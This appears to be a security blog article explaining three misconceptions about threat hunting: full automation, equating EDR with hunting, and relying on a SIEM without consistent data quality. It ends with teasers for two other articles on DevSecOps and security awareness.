Threat hunting is a human-led, machine-assisted initiative, where
hunters look at datasets and patterns to determine whether there’s malicious
activity or an active adversary in the network.As companies try to stay ahead of the latest, ever-evolving
threats, it’s a practice that has become increasingly important to help monitor
and manage what’s happening on the network, detect unknown threats and respond
appropriately to protect the business.To put it simply, it’s a complicated process. There are
understandably many misconceptions.
As a result, misdirection and misunderstanding are lulling
people into a false sense of security and leaving businesses exposed.Here, we’ll take a closer look at three common
misconceptions about threat hunting and uncover what you really need to know to
ensure a productive hunt.Misconception #1: Threat hunting can be automated. The idea that threat hunting can be fully automated is the
most disingenuous misconception out there. While parts of the process can be
automated, the reality is that the human touch is necessary for any successful
threat hunt. End-to-end, from identification to response, it’s not possible to
automate the entire process.Automation plays an important role in threat hunting, from
data gathering to detecting known knowns. In an automation-initiated hunt,
something might get flagged as suspicious via an automated rule. But, once that
happens, you need a threat hunter to look at those clues and perform a
strategic analysis. A machine can raise potential flags, but can’t make an
intelligent decision about whether something is malicious or benign. There are
a lot of things that happen in the grey area, where it’s difficult for a trained
model to make the right judgment call. Human expertise is required to decipher
those grey areas.For example, if you see PsExec running on your network, it’s
not necessarily immediately clear whether it’s malicious or harmless. It’s an
admin tool that’s used for legitimate purposes, but it’s also often used by
malware and attackers trying to do something nefarious. How do you know whether
you’ve come across a malicious or benign case? Human expertise can provide context
around the intent of that command, and evaluate whether it was malicious.Misconception #2: Having endpoint detection and response
(EDR) means that you’re doing threat hunting. Threat hunting and EDR aren’t the same thing. If you’ve
purchased an EDR product, you’re not necessarily doing threat hunting. EDR, at
its core, is a rich dataset that can be used to investigate or query
information. But, while EDR is an essential tool in a threat hunter’s arsenal, it
gives you only part of the story.There are a number of other sources of information that are
extremely valuable in the hunt. Endpoint data is important, but so is network
traffic. Threat hunters will look beyond EDR data at networking logs, firewalls
and intrusion detection and prevention system logs to get a more complete
picture of the landscape. Pulling in any third-party data, like active
directory information, Office 365 data, or data from any other applications in
use, can enrich the dataset, and a rich dataset allows you to identify more
complex threats.Misconception #3: You can add data into a SIEM and start
threat hunting. SIEMs do provide a useful service, in that it’s a place
where we can input a lot of information and start asking questions of that
data. But, one of the biggest challenges with SIEM is that it’s difficult to
keep data consistent. And, unsurprisingly, poor data quality usually means a
hunt will be unproductive.The definition of quality data may be subjective, but at its
core, ensuring that data from disparate systems is normalized and that data
attributes (where possible) are standardized, will go a long way.Quality data is critical for a few reasons:
It increases the productivity of a threat hunt,
making it easier for team members to query large sets of data and retrieve
consistent results
When data attributes are normalized, threat
hunters can avoid joining different sets of data during a threat hunt, while allowing
for richer context to identify more complex threats
Having a good understanding of the quality of
your data allows for the threat hunting team to have clear objectives on data
they CAN analyze and set expectations on what CAN NOT analyze. This allows for
projects to be coordinated and prioritized to increase overall quality.
If you want to find out whether a device is talking to a
certain IP address, for example, you can query the network logs, endpoint logs
and anything else that might have that data attribute. When the data quality is
consistent, the results of that query are more trustworthy. Ensuring
consistency of the data coming into your platforms is something that’s often
overlooked.In addition to the automation-initiation threat hunting
discussed earlier, there are two other types of threat hunting that both
require rich datasets. In a lead-driven hunt, the threat hunter knows that an
actor uses a certain technique, for example, and checks to see if that
information is present in the dataset. A lead-less hunt, on the other hand, starts
with a threat hunter asking a question or presenting a hypothesis – perhaps, “Base64
encoded content run on an endpoint is a common tactic used to obfuscate
malicious activity” – and then looking in the data for supporting information.Good data allows threat hunters to identify complex threats
quickly and more accurately. When a threat hunter knows the data they’re
working with is solid, they can be more effective and more efficient.The bottom lineThe data is just the beginning of the hunt. What’s more
important is how you apply that data to find the initiation point of the threat.
Making the data useful and making the data work for you: this is what machines
can’t automate. In fact, if it could be fully automated, MDR (managed detection
and response) as a category simply wouldn’t exist.A hypothesis about the threat, a method, good data and the
critical thinking of a talented hunter, are the key ingredients to successful
threat hunting. When suspicious activity occurs within the grey area, threat
hunters can apply strategic analysis to decipher intent, and whether or not a
response is needed to protect the business.
There are many ways to do DevSecOps, and each organization — each security team, even — uses a different approach. Questions such as how many environments you have and the frequency of deployment of those environments are important in understanding how to integrate a security scanner into your DevSecOps machinery. The ultimate goal is speed […]
It’s Cybersecurity Awareness Month, but security awareness is about much more than just dedicating a month to a few activities. Security awareness is a journey, requiring motivation along the way. And culture. Especially culture.That’s the point Proofpoint Cybersecurity Evangelist Brian Reed drove home in a recent appearance on Business Security Weekly.“If your security awareness program […]
